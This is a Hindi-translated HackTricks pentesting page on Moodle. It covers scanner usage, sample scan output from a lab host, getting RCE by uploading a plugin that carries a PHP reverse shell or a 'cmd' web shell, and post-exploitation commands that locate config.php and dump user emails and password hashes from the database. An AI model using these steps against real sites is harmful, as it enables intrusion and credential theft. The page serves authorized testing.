Moodle

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

बग बाउंटी टिप: Intigriti के लिए साइन अप करें, एक प्रीमियम बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाया गया है! आज हमारे साथ शामिल हों https://go.intigriti.com/hacktricks और आरंभ करें बाउंटी अर्जित करना जो तकनीकी गलतियों के लिए $100,000 तक हो सकता है!

स्वचालित स्कैन

droopescan

pip3 install droopescan
droopescan scan moodle -u http://moodle.example.com/<moodle_path>/

[+] Plugins found:
forum http://moodle.schooled.htb/moodle/mod/forum/
http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt
http://moodle.schooled.htb/moodle/mod/forum/version.php

[+] No themes found.

[+] Possible version(s):
3.10.0-beta

[+] Possible interesting urls found:
Static readme file. - http://moodle.schooled.htb/moodle/README.txt
Admin panel - http://moodle.schooled.htb/moodle/login/

[+] Scan finished (0:00:05.643539 elapsed)

moodlescan

मूडलस्कैन

#Install from https://github.com/inc0d3/moodlescan
python3 moodlescan.py -k -u http://moodle.example.com/<moodle_path>/

Version 0.7 - Dic/2020
.............................................................................................................

By Victor Herrera - supported by www.incode.cl

.............................................................................................................

Getting server information http://moodle.schooled.htb/moodle/ ...

server         	: Apache/2.4.46 (FreeBSD) PHP/7.4.15
x-powered-by   	: PHP/7.4.15
x-frame-options	: sameorigin
last-modified  	: Wed, 07 Apr 2021 21:33:41 GMT

Getting moodle version...

Version found via /admin/tool/lp/tests/behat/course_competencies.feature : Moodle v3.9.0-beta

Searching vulnerabilities...


Vulnerabilities found: 0

Scan completed.

CMSMap

सीएमएसमैप

pip3 install git+https://github.com/dionach/CMSmap.git
cmsmap http://moodle.example.com/<moodle_path>

CVEs

मुझे लगता है कि स्वचालित उपकरण moodle संस्करण पर प्रभाव डालने वाली सुरक्षा दोषों को खोजने में बहुत असहायक हैं। आप इन्हें https://snyk.io/vuln/composer:moodle%2Fmoodle में जांच कर सकते हैं।

RCE

आपको प्रबंधक भूमिका होनी चाहिए और आप "साइट प्रशासन" टैब के अंदर प्लगइन स्थापित कर सकते हैं**:**

यदि आप प्रबंधक हैं तो आपको शायद इस विकल्प को सक्रिय करने की आवश्यकता हो सकती है। आप देख सकते हैं कि moodle प्रिविलेज उन्नति PoC में कैसे है: https://github.com/HoangKien1020/CVE-2020-14321.

फिर, आप निम्नलिखित प्लगइन स्थापित कर सकते हैं जो क्लासिक pentest-monkey php rev shell को शामिल करता है (इसे अपलोड करने से पहले आपको इसे डीकंप्रेस करना होगा, रेवशेल का आईपी और पोर्ट बदलना होगा और फिर से कंप्रेस करना होगा)

या आप https://github.com/HoangKien1020/Moodle_RCE से प्लगइन का उपयोग कर सकते हैं ताकि "cmd" पैरामीटर के साथ एक सामान्य PHP शैल मिले।

इस दुर्भाग्यपूर्ण प्लगइन तक पहुंचने के लिए आपको यहाँ पहुंचने की आवश्यकता है:

http://domain.com/<moodle_path>/blocks/rce/lang/en/block_rce.php?cmd=id

POST

डेटाबेस क्रेडेंशियल्स खोजें

find / -name "config.php" 2>/dev/null | grep "moodle/config.php"

डेटाबेस से क्रेडेंशियल्स को डंप करें

/usr/local/bin/mysql -u <username> --password=<password> -e "use moodle; select email,username,password from mdl_user; exit"

बग बाउंटी टिप: Intigriti में साइन अप करें, एक प्रीमियम बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाया गया है, हैकर्स के लिए! आज ही हमारे साथ जुड़ें https://go.intigriti.com/hacktricks और शुरू करें बाउंटी अप तक $100,000 तक कमाने की!

जीरो से हीरो तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

Last updated